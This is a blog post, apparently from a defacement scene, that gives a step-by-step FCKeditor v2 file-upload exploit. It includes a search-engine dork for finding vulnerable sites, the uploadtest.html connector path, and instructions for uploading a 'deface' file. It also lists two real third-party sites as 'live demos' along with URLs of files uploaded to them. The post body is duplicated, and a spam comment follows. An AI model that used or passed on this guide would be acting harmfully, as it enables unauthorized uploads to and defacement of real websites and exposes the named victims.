FCKeditor v2 Files Upload Exploit
Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Catagory : Dork
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Go to Google.com or Bing.com and type this Dork : intitle:"FCKeditor - Uploaders Tests"
(use both serach enigines for getting more vulnrable websites)
now you'll Got FCK editor upload option, and you can get Upload option by going to this URL
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now chnage Select the "File Uploader" to use into PHP
Then Select your .txt deface and click on send it to the server (some websites allowed you to upload .html and .jpg files)
if your file sucessfully uploaded, you will got "File uploaded with no errors" Alert
to View your file see Uploaded File URL
or go to http://www.website.domain/userfiles/yourfilehereor http://www.website.domain/path/userfiles/yourfilehere
Live Demo : http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://minisite.nku.edu.tr//userfiles/aaaaaaaa.txt
http://www.relationshiptrends.com/affiliate/img/aaaaaaaa.txt
I Spend my 30 minutes in writing this post
please Spent your 30 secondes and write a Comment below
Please leave your answer here
Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Catagory : Dork
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Go to Google.com or Bing.com and type this Dork : intitle:"FCKeditor - Uploaders Tests"
(use both serach enigines for getting more vulnrable websites)
now you'll Got FCK editor upload option, and you can get Upload option by going to this URL
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now chnage Select the "File Uploader" to use into PHP
Then Select your .txt deface and click on send it to the server (some websites allowed you to upload .html and .jpg files)
if your file sucessfully uploaded, you will got "File uploaded with no errors" Alert
to View your file see Uploaded File URL
or go to http://www.website.domain/userfiles/yourfilehereor http://www.website.domain/path/userfiles/yourfilehere
Live Demo : http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://minisite.nku.edu.tr//userfiles/aaaaaaaa.txt
http://www.relationshiptrends.com/affiliate/img/aaaaaaaa.txt
I Spend my 30 minutes in writing this post
please Spent your 30 secondes and write a Comment below
Please leave your answer here
1 comment:
Interesting post. I Have Been wondering about this issue, so thanks for posting. Pretty cool post.It 's really very nice and Useful post.Thanks Logo design
Post a Comment